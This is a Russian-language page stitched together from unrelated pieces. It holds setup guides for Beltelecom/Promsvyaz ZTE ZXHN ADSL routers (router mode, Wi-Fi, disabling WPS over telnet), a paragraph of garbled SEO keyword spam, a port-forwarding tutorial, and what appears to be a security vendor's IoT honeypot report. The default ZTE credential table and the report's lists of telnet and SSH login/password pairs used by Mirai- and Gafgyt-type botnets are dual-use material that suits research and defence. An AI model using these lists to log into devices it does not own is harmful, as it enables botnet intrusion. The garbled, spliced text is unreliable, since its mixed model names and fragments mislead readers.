Промсвязь zxhn h208n: Настройка Wi-Fi на Промсвязь (ZTE) ZXHN H208N

Содержание

Настройка Wi-Fi на Промсвязь (ZTE) ZXHN h308N

Здравствуйте читатели моего блога! Сегодня научимся настраивать новый роутер ZTE ZXHN h308N выдаваемый Белтелекомом пользователям. Выпуск его уже наладила ОАО Промсвязь и можно у абонентов встретить этот ADSL роутер с слегка изменённым ПО. Импортозамещение это хорошо 🙂 . Также эта инструкция подходит и для настройки Промсвязь (ZTE) ZXHN h208N. Для тех кто хочет заплатить деньги специалисту и не мучаться мега полезная ссылка на услуги настройки.

Для тех кто не хочет тратить своё дорогое время на изучение данного мануала предлагаем нашу платную помощь. 

Подключаем патчкордом компьютер в 1-3 порт роутера:

 

4-ый порт используется для IPTV и через него вы даже доступа к админке не получите.

Настройка роутинга на ADSL модеме Промсвязь (ZTE) ZXHN h308N.

Открываем ваш любимый Web обозреватель Internet Explorer 🙂 и пишем в строку ввода 192.168.1.1 Можно просто кликнуть по этой ссылке: http://192. 168.1.1

Увидим окно авторизации. Username: admin Password: admin

Если это окно не появилось проверьте в свойсвах протокола интернета TCP/IP v4 установлено ли получение IP адресов и DNS автоматически.

Кликните по изображению, чтобы приблизить!

Перейдём на вкладку: WAN/WAN Connection

New Connection Name выберем PVC0:

Изменим тип соединения с Bridge на Route

В поле User Name надо ввести ваш номер договора или логин. В поле Password надо записать пароль от соединения с интернетом.

После завершения записи имени пользователя и пароля нажимаем Modify.

Настройка Wi-Fi на ADSL роутере Промсвязь (ZTE) ZXHN h308N

Идём на вкладку Network/WLAN/SSID Settings для включения и настройки имени вашей сети:

где SSID Name — имя Wi-Fi сети.

Enable SSID — галочка включения сети.

Осталось поменять пароль:

Authentification Type — самый сильный и современный WPA2 на 2017 год

WPA Encryption Algorithm — AES самый сильный алгорим на 2017 год.

12345678 задан исключительно для примера. Вам рекомендую использовать для создания пароля буквы в верхнем и нижнем регистре, символы и цифры не менее 8. Это обеспечит самую малую вероятность проникновения в сеть ваших соседей и лиц занимающихся хагингом Wi-Fi. Не забываем нажать кнопочку сохранить (Sudmit). 

Если не знаете как подключать ноутбуки к Wi-Fi сети используйте эту инструкцию для Windows 7.

Настройка завершена! Если у вас не получилось вы можете вызвать нас для настройки.

Настройка модема Промсвязь ZTE ZXHN h308N в режим Router — Ремонт ноутбуков и компьютеров в Минске

 

ШАГ 1: Откройте Internet Explorer и в строке Адрес наберите http://192.168.1.1


 

ШАГ 2:В появившемся окне в качестве имени пользователя следует указать admin, в качестве пароля

admin. Далее нажмите кнопку «Login»


 

ШАГ 3:В открывшемся окне настройки модема перейдите на вкладку Network. Далее WAN, WAN Connection.


 

ШАГ 4:В открывшемся окне настройки модема перейдите на вкладку Connection name и выбираем PVC0


 

ШАГ 5:В открывшемся окне настройки модема в строке Type выбираем Route.


 

ШАГ 6: В открывшемся окне настройки модема в строках Username и Password соответственно логин (соответствует номеру договора) и пароль, которые вы получаете у работников РУП «Белтелеком». После настроек для сохранения необходимо нажать Modify.


 

Модем настроен.

Настройки WiFi на модеме Промсвязь ZTE ZXHN h308N

  1. Настройки WiFi на модеме Промсвязь ZTE ZXHN h308N ШАГ 1: Откройте Internet Explorer и в строке Адрес наберите http://192.168.1.1 ШАГ 2: В появившемся окне в качестве имени пользователя следует указать admin, в качестве пароля admin. Далее нажмите кнопку «Login» ШАГ 3: Отключаем DHCPv6 Server на вкладке Network -> LAN -> DHCP Server ШАГ 4: Cтавим Ipv6 Function — Off на вкладке Administration -> Ipv6 Switch ШАГ 5: Выбираем закладку Network -> WLAN ШАГ 6: В появившемся окне выбираем закладку SSID Settings.
  2. Настройка WiFi на модеме ZTE ZXV10 W300 и ПРОМСВЯЗЬ M-200 A ВНИМАНИЕ! Для настройки и защиты WiFi на модеме ZTE W300 и Промсвязь M-200 воспользуйтесь небольшим Видео-Уроком от ByHelp.by! Видео-урок доступен для скачивание в «Магазине полезной информации с мгновенной доставкой» в разделе «Бесплатное».
  3. Настройка ZTE 831 и ПРОМСВЯЗЬ УА-101А в Роутер, Annex A ШАГ 1: Откройте Internet Explorer либо любой другой браузер, установленный на Вашем компьютере, и в строке Адрес наберите http://192.168.1.1/     ШАГ 2: В появившемся окне в качестве имени пользователя следует указать admin, в качестве пароля admin.

Настройка WiFi на ByFly ZXHN h308N («Промсвязь»): пошаговая инструкция

Устройство ZXV10 h308L (ZTE ZXHN h308N) сочетает в себе функции ADSL модема, wifi точки доступа, клиента SIP телефонии, а также маршрутизатора. Модем имеет один внешний порт — WAN (Wide Area Network) и четыре внутренних — LAN (Local Area Network). WAN используется чтобы присоединить сетевой интернет кабель к модему. LAN порты обеспечивают подключение различных устройств (ПК, ноутбуков) к внутренней сети. Настройка модема осуществляется через Веб-интерфейс. Для доступа к нему необходим браузер, например Google Chrome.

ZTE ZXHN h308N

ZXV10 h308L

Особенности настройки

Настроить можем можно следующим образом: в режиме Bridge (Интернет будет подключен только к одному компьютеру), в режиме Router или осуществить открытие портов.

В режиме Router подключение к Интернету осуществляется непосредственно через модем. Плюсом работы модема в этом режиме является возможность одновременного использования Интернета различными устройствами (планшет, смартфон ПК и прочее). Для настройки wifi необходимо предварительно наладить режим Router.

Настройка wifi на модемах byfly, в большинстве случаев, является простым процессом, не требует специальных знаний и навыков. Обратите внимание, что перед настройкой wifi на модемах byfly, следует выполнить следующие операции.

  1. Нужно установить модель вашего модема (ZXV10 h308L или ZTE ZXHN h308N).
  2. Проверьте подсоединен ли модем к персональному компьютеру или ноутбуку через сетевой кабель.
  3. Убедитесь в рабочем соединении при подключении к Интернету через сетевой кабель.
  4. Настройте wifi на модеме byfly в соответствии с инструкцией.

Настройка в режим Router

Устройство ZXV10 h308L (ZTE ZXHN h308N) изначально находится в режиме Bridge, то есть доступ к Интернету есть только с одного ПК, для перехода в Router нужно придерживаться инструкции, рассмотренной ниже.

Запустите браузер, желательно Internet Explorer, пропишите параметры роутера
192.168.1.1

Открываем браузер, вводим в адресной строке http://192.168.1.1

Откроется новая вкладка. Укажите в поле Username значение admin, в поле Password значение admin. Нажмите кнопку «Login».

Осуществите переход в меню Network Interface/Network.

Следом заполните Connection name, необходимо выбрать опцию PVC0, а в случае ее отсутствия –Byfly.

Необходимо удалить Bridge-соединение. Для этого следует нажать на кнопку «Delete».

Появится новая вкладка. Задайте в поле New Connection Name название вашего подключения, к примеру, PVC0. Далее перейдите к полю VPI/VCI, где следует указать 0/33. Пропишите информацию с вашего договора в соответствующие поля Username и Password, нажмите кнопку «Create».

Если подключение к Интернету отсутствует, стоит проверить корректность информации Username и Password.

Настройка Wi-Fi

Для осуществления настройки Wi-Fi на устройстве ZXV10 h308L или ZTE ZXHN h308N необходимо нажать и около 20 секунд удерживать кнопку «Wlan», после этого должен замигать соответствующий индикатор. Выполняем вход в настройки роутера как было указано выше.

Перейдите во вкладку Network Interface.

Перейдите в Network.

Выберите вкладку WLAN.

Выберите Multi-SSID. В поле SSID Name задайте новое значение. Нажмите кнопку Submit.

Перейдите во вкладку Security, в поле WPA Passphrase введите новый пароль для вашей беспроводной сети, его длина должна быть от 8 символов. В дальнейшем, при подключении устройства к Wi-Fi сети, следует указывать созданный в поле WPA Passphrase пароль. Советуем установить следующие значения — в поле WPA Encription Algorithm: AES и Authention Type: WPA2-PSK.

Нажмите кнопку Submit. Настройка беспроводного Интернета на модеме ZXV10 h308L (ZTE ZXHN h308N) окончена, теперь можно осуществлять подключение любых устройств к созданной сети.

Нашли опечатку? Выделите текст и нажмите Ctrl + Enter

Настройка WiFi на модеме Промсвязь ZTE ZXHN h308N

ШАГ 1:
 Откройте Internet Explorer и в строке Адрес наберите  http://192.168.1.1

ШАГ 2:   В появившемся окне в качестве имени пользователя следует указать admin, в качестве пароля admin. Далее нажмите кнопку «Login»

ШАГ 3: Отключаем DHCPv6 Server на вкладке Network => LAN => DHCP Server(IPv6)

ШАГ 4: Cтавим Ipv6 Fuction — Off на вкладке Administration => Ipv6 Switch

ШАГ 5: Выбираем закладку Network => WLAN

ШАГ 6: В появившемся окне выбираем закладку SSID Settings. И выставляем галочку в значении Enable SSID.

Затем в строке 

SSID Name задаем имя Wi -Fi точки. Для сохранения настрое нажимаем Submit.

ШАГ 7: В окне выбираем закладку Security и в строке WPA Passphrase вводим ключ (придумываем свой).

При подключение через Wi-Fi надо будет ввести ключ который вы внесли в строке в WPA Passphrase. Нажимаем Submit.

Домашний шлюз zxhn h308n инструкция подключение телефона — JSFiddle

Editor layout

Classic Columns Bottom results Right results Tabs (columns) Tabs (rows)

Console

Console in the editor (beta)

Clear console on run

General

Line numbers

Wrap lines

Indent with tabs

Code hinting (autocomplete) (beta)

Indent size:

2 spaces3 spaces4 spaces

Key map:

DefaultSublime TextEMACS

Font size:

DefaultBigBiggerJabba

Behavior

Auto-run code

Only auto-run code that validates

Auto-save code (bumps the version)

Auto-close HTML tags

Auto-close brackets

Live code validation

Highlight matching tags

Boilerplates

Show boilerplates bar less often

Как отключить WPS в модеме ZTE ZXHN h308N

Достался от Белтелекома модем Промсвязь ZXHN h308N, по сути ZTE ZXHN h308N. ]’.
ZXHN h308N
Login: root
Password:

BusyBox v1.01 (2015.06.04-01:56+0000) Built-in shell (ash)
Enter ‘help’ for a list of built-in commands.

#

Получаем статус WPS следующей командой

sendcmd 1 DB p WLANWPS

В ответе показывается нечто вот такое:

<Tbl name="WLANWPS" RowCount="4">
<Row No="0">
<DM name="ViewName" val="IGD.LD1.WLAN1.WPS"/>
<DM name="WLANViewName" val="IGD.LD1.WLAN1"/>
<DM name="Enable" val="1"/>
<DM name="WPSMode" val="0"/>
</Row>
<Row No="1">
<DM name="ViewName" val="IGD.LD1.WLAN2.WPS"/>
<DM name="WLANViewName" val="IGD.LD1.WLAN2"/>
<DM name="Enable" val="0"/>
<DM name="WPSMode" val="0"/>
</Row>
<Row No="2">
<DM name="ViewName" val="IGD.LD1.WLAN3.WPS"/>
<DM name="WLANViewName" val="IGD.LD1.WLAN3"/>
<DM name="Enable" val="0"/>
<DM name="WPSMode" val="0"/>
</Row>
<Row No="3">
<DM name="ViewName" val="IGD. LD1.WLAN4.WPS"/>
<DM name="WLANViewName" val="IGD.LD1.WLAN4"/>
<DM name="Enable" val="0"/>
<DM name="WPSMode" val="0"/>
</Row>
</Tbl>

Строчка <DM name=»Enable» val=»1″/> даёт понять, что WPS таки включен.

Выключаем командой:

sendcmd 1 DB set WLANWPS 0 Enable 0

Получаем ответ

<Tbl name="WLANWPS" RowCount="4">
<Row No="0">
<DM name="ViewName" val="IGD.LD1.WLAN1.WPS"/>
<DM name="WLANViewName" val="IGD.LD1.WLAN1"/>
<DM name="Enable" val="0"/>
<DM name="WPSMode" val="0"/>
</Row>
<Row No="1">
<DM name="ViewName" val="IGD.LD1.WLAN2.WPS"/>
<DM name="WLANViewName" val="IGD.LD1.WLAN2"/>
<DM name="Enable" val="0"/>
<DM name="WPSMode" val="0"/>
</Row>
<Row No="2">
<DM name="ViewName" val="IGD.LD1.WLAN3.WPS"/>
<DM name="WLANViewName" val="IGD. LD1.WLAN3"/>
<DM name="Enable" val="0"/>
<DM name="WPSMode" val="0"/>
</Row>
<Row No="3">
<DM name="ViewName" val="IGD.LD1.WLAN4.WPS"/>
<DM name="WLANViewName" val="IGD.LD1.WLAN4"/>
<DM name="Enable" val="0"/>
<DM name="WPSMode" val="0"/>
</Row>
</Tbl>

Сохраняем изменения

sendcmd 1 DB save

Я перезагружал модем чтобы убедиться, что настройки сохранились. Есть ли в этом насущная необходимость — сказать не могу.

Zxhn h308n как настроить wifi

Имеется адсл модем 208. Настройка модеме 108 промсвязь настройка модеме 208 видео настройка модеме промсвязь 208. Настройка 208 инструкции приложения инструкция модему 208 как настроить модем вторую. Как настроить 108 или. Люди как настроить модеме вроде все делаю инструкции инета нет как настроить модеме 208. Настройки для модема промсвязь 201 208 208 прежде чем начать настройку модеме. Проблема слетела прошивка модема. Имеется связь модема 208. Уважаемые может кто подсказать как настроить 208 качестве репетитора повторителя. Как настроить избавиться этого поможет модем 208. Настройка модема 208 роутер настройка 208. Настройка модема 208 роутер настройка 208 настройка модеме промсвязь 10 208. Как настроить модем 208. Сравнение скорости. Избавиться этого поможет модем 208. Настройка промсвязь вызовет трудностей даже неопытных пользователей. Z 208 обсуждение обсуждение настройка. Как настроить модеме 108. Как поменять пароль 208 настройка как поменять пароль 208 установка как. Настройка заметке подробно описано как настроить белтелеком. От его близнеца модема 208. Настройка роутера 10 208 208.Модем позвоните белтелеком номеру 123 попросите настроить маршрутизатор роутер. Настройки модеме промсвязь 208 шаг откройте строке адрес. Настройка модеме промсвязь 4 перед тем как начать настраивать модем позвоните. Как почистить ноутбук пыли. Инструкция как настроить модем 108 2. Как настроить модеме 208. Как устранить проблемы горящим индикатором. Настройка 208 страница. Настройка обычно не. В настройки роутера как было. Шаг настройте модем режим откроется новое окно настроек промсвязь 208 строке из. Настроить можем можно следующим образом режиме. Здравствуйте подскажите пожалуйста можно отключать включать роутер 208. Вся информация предоставлена как. Настройка как выполнить настройку модеме 208 настройка. Поскольку львиная доля современных устройств работает через модем 208. Настройка интернета модем 267. Настройка модема 108 10 108 для.Помогите пожалуйста настроить этом модеме 208. Так как беспроводной сети. Z 208 обсуждение 4 помощь. Прошить систему файлом 1182. Если вас стационарный персональный компьютер настройка беспроводного соединения. Я расскажу как прошить настроить роутер. O 208 настройка как настроить. Y 208 настройка модема 208. Настройка модема 208. В данной статье предлагается пошаговая инструкция как подключить настроить модем 108. Инструкция настройке модема промсвязь 208 режим роутер. Вставить модем настроить какнибудь. Пошаговая инструкция по. Настройка модема режим беспроводного» frameborder=»0″ allowfullscreen>
Настройка модема 208 роутер настройка 208 данной статье рассказывается как настроить беспроводную связь модеме. Настройка модема промсвязь 208 настройка настройка модема промсвязь 208. Второй роутер 208 сеть для раздачи интернета сети. Настройка модеме 208 настройка модеме. Как настроить порт под. W роутер 118 своим возможностям не. Настройки модеме промсвязь 208. Это модемы 208 10 208. Как настроить получение времени даты этом роутере быстренько покажу как настроить этом. Настройка модеме промсвязь 208. Инструкция настройке модеме промсвязь 208 смотреть видео данной статье рассказывается как настроить беспроводную связь модеме 208. Можно модеме 562 сделать так чтобы раздавал. Все устройство настроен его можно использовать для подключения через. Учимся прошивать модем 208. Как они работают именно нем

ZTE ZXHN h308N CYTA — IP-адрес для входа по умолчанию, имя пользователя и пароль по умолчанию

Чтобы получить доступ к ZTE ZXHN h308N CYTA, вам потребуется IP-адрес вашего устройства, имя пользователя и пароль. Вы найдете такую ​​информацию в Руководстве по эксплуатации вашего роутера ZTE ZXHN h308N CYTA. Но если у вас нет руководства для вашего маршрутизатора или вы не хотите читать все руководство, чтобы найти информацию для входа в систему по умолчанию, вы можете использовать краткое руководство ниже. Чтобы попасть на страницу входа в маршрутизатор, необходимо, чтобы вы были подключены к маршрутизатору.

ZTE ZXHN h308N CYTA Руководство по входу

  • Откройте веб-браузер (например, Chrome, Firefox, Opera или любой другой браузер)
  • Введите 192.168.1.1 (IP-адрес по умолчанию для доступа к интерфейсу администратора) в адресной строке ваш интернет-браузер, чтобы получить доступ к пользовательскому веб-интерфейсу маршрутизатора.
  • Вы должны увидеть 2 текстовых поля, где вы можете ввести имя пользователя и пароль.
  • Имя пользователя по умолчанию для вашего ZTE ZXHN h308N CYTA — cytauser .
    Пароль по умолчанию — cytauser .
  • Введите имя пользователя и пароль, нажмите «Enter», и теперь вы должны увидеть панель управления вашего роутера.

Если указанные выше учетные данные не работают с вашим маршрутизатором ZTE ZXHN h308N CYTA, попробуйте этот метод

Попробуйте различные комбинации идентификатора / пароля, которые широко используются ZTE, которые вы найдете ниже. В этом списке представлены самые популярные комбинаций имени пользователя по умолчанию и паролей, используемых ZTE.Иногда имя пользователя и пароль не работают, о чем мы упоминали в верхней части этого руководства. Затем вы можете попробовать указанные ниже комбинации имени пользователя и пароля, чтобы получить доступ к беспроводному маршрутизатору ZTE ZXHN h308N CYTA.

900 42
# Имя пользователя Пароль
1 admin admin
2 user user
3 (пусто) admin
4 admin
5 admin
6 1admin0 ltecl4r0
7 пользователь (пусто)
8 (пусто ) (пусто)
9 (пусто) attadmin
10 cytauser cytauser
11 admin пароль
12 (пусто ) пароль
13 admin напечатано на маршрутизаторе
14 3play 3play
15 attadmin
16 ZXDSL ZXDSL
17 пароль
18 HPN пусто)
19 (пусто) smartbro
20 admin на этикетке маршрутизатора
21 admin bayandsl
22 attadmin attadmin
23 Администратор admin
24 mtn admin

IP-адреса входа по умолчанию для моего маршрутизатора ZTE

Вы пробовали разные IP-адреса маршрутизатора, но ничего не помогло? Вы пробовали следующие IP-адреса? В списке ниже мы перечислили все известные IP-адреса маршрутизаторов производителя ZTE. Может быть, это сработает для вас.

# IP маршрутизатора по умолчанию
1 192.168.1.1
2 192.168.0.1
3 192.168.2.254
4 192.168.1.254
5 192.168.8.1
6 192.168.100.1
7 192.168.128.1
8 192.168.200.1

Руководства для ZTE ZXHN h308N CYTA

Руководство

Ни один из методов у меня не сработал и я до сих пор не могу получить доступ к своему ZTE!

Все, что вам нужно сделать, это перезагрузить модем. Это можно легко сделать, нажав кнопку сброса на задней или нижней панели маршрутизатора. Если вы удерживаете эту маленькую кнопку примерно на 20 секунд (возможно, вам придется использовать зубочистку), тогда ваш модем вернется к заводским настройкам. Что вам нужно иметь в виду, так это то, что при перезагрузке модема вы потеряете соединение с Интернетом. Поэтому в этом случае лучше обратиться за помощью к специалисту. Примечание : Если у вас недостаточно информации, очевидно, что вам рекомендуется обратиться за помощью к человеку, обладающему всеми знаниями по этой теме.

Самый быстрый маршрутизатор ZTE ZXHN h308N Руководство по открытому порту

Это руководство с открытым портом для ZTE ZXHN h308N . У нас также есть следующие сопутствующие руководства:

Выберите направляющую, наиболее подходящую для вашего роутера.

Маршрутизаторы

ZTE ZXHN_h308N включают в себя очень простой брандмауэр, который помогает защитить вашу домашнюю сеть от нежелательного доступа из Интернета. Поскольку этот брандмауэр блокирует входящие соединения, вам может потребоваться , чтобы открыть через него порт для определенных игр и приложений. Этот процесс открытия порта часто называется переадресацией порта на , поскольку вы перенаправляете порт из Интернета в свою домашнюю сеть.

Базовый процесс открытия порта:

  1. Установите статический IP-адрес на вашем компьютере или устройстве, на которое вы хотите перенаправить порт.
  2. Войдите в свой маршрутизатор ZTE ZXHN h308N.
  3. Перейдите в раздел переадресации портов.
    • Щелкните ссылку Приложение .
    • Щелкните Port Forwarding .
  4. Создайте запись переадресации порта .

Хотя сначала эти шаги могут показаться сложными, мы проведем вас через каждый шаг для вашего маршрутизатора ZTE ZXHN_h308N.

Мы думаем, что переадресация порта должна быть простой. Вот почему мы создали Сетевые утилиты.Наше программное обеспечение делает все, что вам нужно для перенаправления порта.

Начать сейчас!

Когда вы используете сетевые утилиты, ваш порт перенаправляется прямо сейчас!

Шаг 1

Важно настроить статический IP-адрес на устройстве, на которое вы перенаправляете порт. Это гарантирует, что ваши порты останутся открытыми даже после перезагрузки устройства.

  • Рекомендуется — Наша бесплатная программа установит для вас статический IP-адрес.
  • Или следуйте нашим инструкциям по статическому IP-адресу, чтобы настроить статический IP-адрес.

После настройки статического IP-адреса на ваших устройствах вам необходимо войти в свой маршрутизатор.

Шаг 2

Теперь войдем в ваш роутер ZTE ZXHN_h308N. У вашего маршрутизатора есть веб-интерфейс, поэтому вы войдете в него с помощью веб-браузера. Это может быть Chrome, Firefox, Internet Explorer или Edge. Обычно не имеет значения, какой браузер вы решите использовать.

Откройте веб-браузер и найдите адресную строку .Должно получиться примерно так:


192.168.1.1

На картинке выше адресная строка содержит 192.168.1.1. Просто замените все это IP-адресом вашего маршрутизатора ZTE ZXHN_h308N. IP-адрес вашего маршрутизатора также можно использовать в качестве шлюза по умолчанию для вашего компьютера.

По умолчанию установлен IP-адрес: 192.168.1.1

После ввода IP-адреса вашего роутера вы можете просто нажать Enter. Если все пойдет хорошо, вы увидите следующий экран:

Вы должны увидеть окно с запросом вашего имени пользователя и пароля.

  • Имя пользователя маршрутизатора ZTE ZXHN h308N по умолчанию: admin
  • Пароль маршрутизатора ZTE ZXHN h308N по умолчанию: admin

Введите свое имя пользователя и пароль, а затем нажмите кнопку Login , чтобы войти в свой маршрутизатор ZTE ZXHN_h308N.

Имена пользователей и пароли ZTE

Если ваше имя пользователя и пароль не работают, посетите нашу страницу Пароли маршрутизатора ZTE по умолчанию .

Если вы по-прежнему не можете войти в свой маршрутизатор, потому что вы забыли имя пользователя и пароль маршрутизатора ZTE ZXHN_h308N, воспользуйтесь нашим руководством Как сбросить пароль маршрутизатора , чтобы восстановить заводские настройки маршрутизатора ZTE ZXHN_h308N.

Шаг 3

Теперь нам нужно найти раздел перенаправления портов в вашем маршрутизаторе. Вот как ты это делаешь. Начиная с первой страницы в вашем роутере:

Щелкните ссылку Application в левой части страницы.

Теперь вы должны увидеть новое меню. В этом новом меню щелкните Port Forwarding .

Шаг 4

Вот порты для переадресации для Xbox Live :

TCP-порты: 3074
UDP-порты: 3074

Если вы ищете порты для другого приложения, вы можете найти их по:

В поле Включить поставить галочку.

Придумайте имя для ввода в поле Имя . Название никак не влияет на функциональность форварда, оно просто присутствует, чтобы вы могли узнать, почему он был создан.

В поле Протокол выберите протокол для портов, которые нужно перенаправить.

Если вы перенаправляете диапазон портов, введите наименьший номер диапазона в поля WAN Start Port и LAN Host Start Port . Затем введите наивысший номер диапазона в поля Конечный порт WAN и Конечный порт хоста LAN .Если вы перенаправляете один порт, введите этот номер порта в поля WAN Start Port , WAN End Port , LAN Host Start Port и LAN Host End Port .

Введите IP-адрес, на который вы хотите перенаправить эти порты, в поле IP-адрес хоста LAN . Обратите внимание: если вы перенаправляете порты, чтобы запустить программу на другом устройстве, а не на вашем компьютере, вы можете вместо этого ввести IP-адрес своего устройства в это поле.

Когда все будет готово, нажмите кнопку Добавить .

Теперь ваши порты должны быть открыты. Пора их испытать.

Проверьте, открыты ли ваши порты

Теперь, когда вы перенаправили порты на ZTE ZXHN_h308N, вы должны проверить, правильно ли перенаправлены ваши порты.

Чтобы проверить, правильно ли перенаправлен ваш порт, вы можете использовать наш инструмент Network Utilities , который включает бесплатный Open Port Checker. Наш инструмент Open Port Check — единственный инструмент онлайн-проверки порта с гарантированными результатами .

ZTE ZXHN_h308N Router Скриншоты

У нас также есть самая большая в Интернете коллекция из скриншотов маршрутизатора .

приманок и Интернет вещей

В 2016 году произошел ряд инцидентов, которые вызвали повышенный интерес к безопасности так называемых IoT или «умных» устройств. Среди прочего, они включали рекордные DDoS-атаки против французского хостинг-провайдера OVH и американского DNS-провайдера Dyn. Известно, что эти атаки были запущены с помощью огромного ботнета, состоящего из маршрутизаторов, IP-камер, принтеров и других устройств.

В прошлом году мир также узнал о колоссальном ботнете, состоящем из почти пяти миллионов маршрутизаторов. Немецкий телекоммуникационный гигант Deutsche Telekom также столкнулся со взломом маршрутизатора после того, как устройства, используемые клиентами оператора, были заражены Mirai. Взлом не ограничился сетевым оборудованием: проблемы с безопасностью были обнаружены также в умных посудомоечных машинах Miele и плитах AGA. «Вишенкой на торте» стал червь BrickerBot, который не просто заразил уязвимые устройства, как большинство его «сверстников», но фактически сделал их полностью неработоспособными.

По данным Gartner, в настоящее время на планете насчитывается более 6 миллиардов устройств Интернета вещей. Такое огромное количество потенциально уязвимых гаджетов не могло остаться незамеченным киберпреступниками. По состоянию на май 2017 года в коллекциях «Лаборатории Касперского» было несколько тысяч различных образцов вредоносного ПО для устройств Интернета вещей, около половины из которых были обнаружены в 2017 году.

Количество образцов вредоносных программ Интернета вещей, обнаруживаемых ежегодно (2013 — 2017)

Угроза конечному пользователю

Если в вашей домашней сети есть устройство IoT, которое плохо настроено или содержит уязвимости, это может вызвать серьезные проблемы. Самый распространенный сценарий — ваше устройство оказывается частью ботнета. Этот сценарий, пожалуй, самый безобидный для его владельца; другие сценарии более опасны. Например, устройства вашей домашней сети могут использоваться для выполнения незаконных действий, или киберпреступник, получивший доступ к устройству IoT, может шпионить за его владельцем, а затем шантажировать его — мы уже слышали о таких вещах. В конечном итоге зараженное устройство можно просто сломать, хотя это ни в коем случае не худшее, что может случиться.

Основные проблемы умных устройств

Прошивка

В лучшем случае производители устройств не спешат выпускать обновления прошивки для интеллектуальных устройств. В худшем случае прошивка вообще не обновляется, и многие устройства даже не имеют возможности устанавливать обновления прошивки.

Программное обеспечение на устройствах может содержать ошибки, которыми могут воспользоваться злоумышленники. Например, троян PNScan (Trojan. Linux.PNScan) пытался взломать маршрутизаторы, используя одну из следующих уязвимостей:

  • CVE-2014-9727 для атаки на маршрутизаторы Fritz! Box;
  • Уязвимость в HNAP (протокол администрирования домашней сети) и уязвимость CVE-2013-2678 для атаки на маршрутизаторы Linksys;
  • ShellShock (CVE-2014-6271).

Если что-то из этого сработало, PNScan заразил устройство бэкдором Tsunami.

Троян Persirai использовал уязвимость, присутствующую в более чем 1000 различных моделей IP-камер. В случае успеха он мог запускать произвольный код на устройстве с привилегиями суперпользователя.

Есть еще одна лазейка в системе безопасности, связанная с реализацией протокола TR-069. Этот протокол разработан для удаленного управления устройствами оператора и основан на протоколе SOAP, который, в свою очередь, использует формат XML для передачи команд.В парсере команд обнаружена уязвимость. Этот механизм заражения использовался в некоторых версиях троянца Mirai, а также в Hajime. Так были заражены устройства Deutsche Telekom.

Пароли, Telnet и SSH

Еще одна проблема — это заранее настроенные пароли, установленные производителем. Они могут быть одинаковыми не только для одной модели, но и для всего ассортимента продукции производителя. Более того, такая ситуация существует так долго, что комбинации логина и пароля можно легко найти в Интернете — чем активно пользуются киберпреступники.Еще один фактор, облегчающий работу киберпреступникам, заключается в том, что у многих устройств Интернета вещей есть свои telnet- и / или SSH-порты, доступные для внешнего мира.

Например, вот список комбинаций логина и пароля, которые использует одна версия троянца Gafgyt (Backdoor.Linux.Gafgyt):

корень корень
корень
телнет телнет
! Корень
поддержка поддержка
руководитель зяд1234
корень муравей
корень гость12345
корень тини
корень летакла
корень Поддержка1234

Статистика

Мы установили несколько приманок (ловушек), имитирующих различные устройства под управлением Linux, и оставили их подключенными к Интернету, чтобы посмотреть, что с ними происходит «в дикой природе». Результат не заставил себя ждать: буквально через несколько секунд мы увидели первые попытки подключения к открытому telnet-порту. За 24 часа были предприняты десятки тысяч попыток подключения с уникальных IP-адресов.

Количество попыток атак на приманки с уникальных IP-адресов. Январь-апрель 2017 г.

В большинстве случаев при попытках подключения использовался протокол telnet; остальные использовали SSH.

Распределение попыток атак по типу используемого порта подключения.Январь-апрель 2017

Ниже приведен список наиболее популярных комбинаций логина и пароля, которые вредоносные программы используют при попытке подключения к telnet-порту:

Пользователь Пароль
корень xc3511
корень vizxv
админ админ
корень админ
корень xmhdipc
корень 123456
корень 888888
корень 54321
поддержка поддержка
корень по умолчанию
корень корень
админ пароль
корень анко
корень
корень juantech
администратор smcadmin
корень 1111
корень 12345
корень проезд
админ админ1234

Вот список, используемый для атак SSH. Как видим, он немного отличается.

Пользователь Пароль
администратор по умолчанию
администратор админ
опора поддержка
администратор 1111
администратор
пользователь пользователь
Администратор админ
администратор корень
корень корень
корень админ
убнт убнт
администратор 12345
тест тест
администратор <Любой проход>
администратор Anypass
администратор
администратор 1234
корень пароль
корень 123456

Теперь давайте посмотрим на типы устройств, с которых исходили атаки. Более 63% из них можно идентифицировать как услуги DVR или IP-камеры, а около 16% — это различные типы сетевых устройств и маршрутизаторов от всех основных производителей. 1% составляли ретрансляторы Wi-Fi и другое сетевое оборудование, ТВ-тюнеры, устройства передачи голоса по IP, узлы выхода Tor, принтеры и устройства «умного дома». Около 20% устройств однозначно идентифицировать не удалось.

Распределение источников атак по типам устройств. Январь-апрель 2017

Большинство IP-адресов, с которых попытки подключения поступили в наши приманки, отвечают на HTTP-запросы.Обычно каждый IP-адрес используется несколькими устройствами (используется технология NAT). Устройство, отвечающее на HTTP-запрос, не всегда является устройством, атаковавшим нашу приманку, хотя обычно это так.

Ответом на такой запрос была веб-страница — панель управления устройством, какая-то форма наблюдения или, возможно, видео с камеры. С помощью этой возвращенной страницы можно попытаться определить тип устройства. Ниже приведен список наиболее частых заголовков веб-страниц, возвращаемых атакующими устройствами:

HTTP-заголовок Устройство%
NETSurveillance WEB 17.40%
Компоненты DVR Загрузить 10,53%
ВЕБ-СЕРВИС 7,51%
главная 2,47%
IVSWeb 2.0 — Добро пожаловать! 2,21%
ZXHN h308N V2.5 2,04%
Веб-клиент 1,46%
Страница конфигурации маршрутизатора RouterOS 1,14%
NETSuveillance WEB 0.98%
Техниколор 0,77%
Консоль администрирования 0,77%
Mіdem — Inicio de sesiГіn 0,67%
НЕЙТРОН 0,58%
Открыть Webif 0,49%
hd клиент 0,48%
Неверный вход в систему 0,44%
iGate GW040 GPON ONT 0. 44%
CPPLUS DVR — веб-просмотр 0,38%
Веб-камера 0,36%
Домашний шлюз GPON 0,34%

Мы видим только часть атакующих устройств в наших приманках. Если нам нужно оценить, сколько в мире устройств одного типа, могут помочь специализированные поисковые службы, такие как Shodan или ZoomEye. Они сканируют диапазоны IP-адресов на предмет поддерживаемых услуг, опрашивают их и индексируют результаты.Мы взяли некоторые из наиболее часто используемых заголовков с IP-камер, видеорегистраторов и маршрутизаторов и искали их в ZoomEye. Результаты оказались впечатляющими: были обнаружены миллионы устройств, которые потенциально могут быть (и, скорее всего, заражены) вредоносным ПО.

Количество IP-адресов потенциально уязвимых устройств: IP-камер и видеорегистраторов.

HTTP-заголовок Устройства
ВЕБ-СЕРВИС 2 785 956
NETSurveillance WEB 1 621 648
dvrdvs 1 569 801
Компоненты DVR Загрузить 1 210 111
NetDvrV3 239 217
IVSWeb 55 382
Итого 7 482 115

Номера IP-адресов потенциально уязвимых устройств: маршрутизаторы

HTTP-заголовок Устройства
Элтекс НТП 2 653
